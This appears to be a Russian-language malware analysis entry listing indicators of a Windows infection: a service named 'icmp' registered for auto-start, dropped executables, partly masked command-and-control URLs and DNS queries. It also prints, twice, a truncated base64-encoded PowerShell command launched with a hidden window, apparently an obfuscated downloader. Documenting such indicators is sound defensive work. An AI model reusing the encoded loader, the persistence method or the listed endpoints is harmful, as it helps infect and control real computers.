Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\icmp] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\icmp] 'ImagePath' = '"%WINDIR%\SysWOW64\kbdgeoqw\icmp.exe"'
- 'icmp' "%WINDIR%\SysWOW64\kbdgeoqw\icmp.exe"
- 'icmp' %WINDIR%\SysWOW64\kbdgeoqw\icmp.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABaAHoAegAxADAANABjAD0AKAAnAFoAMwAnACsAKAAnAHcAJwArACcAZwBqACcAKQArACcAZwBjACcAKQA7ACYAKAAnAG4AZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUATgB2ADoAdQBTAEUAcgBwAHIATwBmAEkATABlAFwAcgBUAEIAXwB0AD...
- %HOMEPATH%\rtb_t79\gby3kw_\pdibtbf9t.exe
- %WINDIR%\syswow64\kbdgeoqw\icmp.exe
- %HOMEPATH%\rtb_t79\gby3kw_\pdibtbf9t.exe в %WINDIR%\syswow64\kbdgeoqw\icmp.exe
- '96.#27.52.8':443
- http://ne###cim.com/lunkx/rH/
- http://ci###suqol.com/zaf1hlz/jNf/
- http://ta##n.pro/cgi-bin/bdV/
- http://96.##7.52.8:443/yJG9RNST4nI2/68OP/fhLCSVvVlERe/ via 96.#27.52.8
- DNS ASK ne###cim.com
- DNS ASK ci###suqol.com
- DNS ASK ta##n.pro
- '%HOMEPATH%\rtb_t79\gby3kw_\pdibtbf9t.exe'
- '%WINDIR%\syswow64\kbdgeoqw\icmp.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABaAHoAegAxADAANABjAD0AKAAnAFoAMwAnACsAKAAnAHcAJwArACcAZwBqACcAKQArACcAZwBjACcAKQA7ACYAKAAnAG4AZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUATgB2ADoAdQBTAEUAcgBwAHIATwBmAEkATABlAFwAcgBUAEIAXwB0AD...' (со скрытым окном)